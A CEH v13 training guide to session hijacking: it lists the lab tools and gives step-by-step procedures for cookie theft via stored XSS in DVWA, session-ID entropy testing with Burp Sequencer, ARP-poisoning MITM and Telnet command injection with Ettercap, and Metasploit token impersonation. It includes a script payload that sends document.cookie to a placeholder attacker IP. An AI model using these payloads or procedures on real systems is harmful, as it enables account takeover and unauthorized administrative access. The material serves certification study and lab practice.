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11: Session Hijacking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step-by-step procedures for the hands-on lab sessions required to master Session Hijacking as defined in the CEH v13 curriculum.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Session Hijacking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Network Level Hijacking (TCP/UDP)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comprehensive suite for Man-in-the-Middle attacks. It features the "Unified Sniffing" mode which is the standard for hijacking active TCP sessions in a switched environment.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Bettercap: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modern, modular successor to Ettercap. It is more stable for ARP poisoning and session monitoring on modern networks.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Scapy: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 Python-based interactive packet manipulation program. It is used in advanced labs to manually calculate and inject the next TCP sequence number.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Application Level Hijacking (HTTP/Web)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Burp Suite (Sequencer):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Essential for "Session Prediction" attacks. It analyzes the randomness (entropy) of session tokens to determine if they can be guessed.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OWASP ZAP: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open-source alternative to Burp for intercepting and replaying session cookies.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EditThisCookie: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browser extension used to manually inject stolen session tokens into a browser to impersonate a user.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CookieCadger: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tool for identifying and replaying insecure HTTP session cookies.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Post-Exploitation Token Theft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Metasploit (Incognito Extension):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once a machine is compromised to list and "impersonate" security tokens of logged-in users, effectively hijacking their OS-level session.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Application Level - Cookie Theft via XSS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Cross-Site Scripting (XSS) vulnerability to steal a user's session cookie.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vulnerable app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DVWA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(Damned Vulnerable Web Application).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Locate a "Stored XSS" field.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Inject the following script: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&lt;script&gt;new Image().src="http://[Attacker_IP]/log.php?c="+document.cookie;&lt;/script&gt;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Monitor your web server logs. When a victim views the page, their PHPSESSID is sent to your server.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Hijack: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your browser's Developer Tools, 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Application/Storage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tab, and replace your own cookie value with the stolen one. Refresh the page to be logged in as the victim.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Application Level - Predicting Session IDs (Burp Sequencer)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Determine if a web application uses a weak algorithm for session ID generation.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Intercept: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Burp Suite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intercept a successful login or a session-start request.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Send to Sequencer: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Right-click the request and select "Send to Sequencer."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the Sequencer tab, select the cookie/token form field.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"Start Capture." Wait for Burp to gather at least 1,000 samples.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Analyze the "Overall Quality" of randomness. If the result is "Poor" or "Low Entropy," an attacker can use a script to brute-force or predict future valid session IDs.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Network Level - MITM Hijacking with Ettercap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Intercept and take over a Telnet or unencrypted HTTP session.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sudo ettercap -G.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Discovery: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Sniff -&gt; Unified Sniffing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Hosts -&gt; Scan for hosts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 the Gateway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the Victim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 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ARP Poison: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MITM -&gt; ARP Poisoning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(check "Sniff remote connections").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Connections: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View -&gt; Connections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Hijack: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an active Telnet connection (Port 23). Double-click it. You can now see the cleartext communication and use the "Inject" feature to send commands (like useradd) to the server as if you were the legitimate user.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OS Level - Token Impersonation (Metasploit)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Hijack the identity of a logged-in Administrator on a compromised Windows host.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Shell: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Gain a Meterpreter session on a Windows target.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Load Incognito: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load incognito.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 Tokens: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list_tokens -u. Look for the "Delegation Tokens" section.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Impersonate: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an Administrator token is found, type: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impersonate_token "DOMAIN\\Administrator"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getuid to confirm you have successfully hijacked the administrative session.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Key CEH Exam Technical Nuance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"Predict" Step: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exam, remember that TCP hijacking relies on predicting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32-bit Sequence Number (SEQ)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Sidejacking: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the specific term for sniffing session cookies on unencrypted Wi-Fi (using tools like Hamster/Ferret or CookieCadger).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Blind Hijacking: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in this mode, the attacker can send data (like a command to delete a file) but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see the server's output/response.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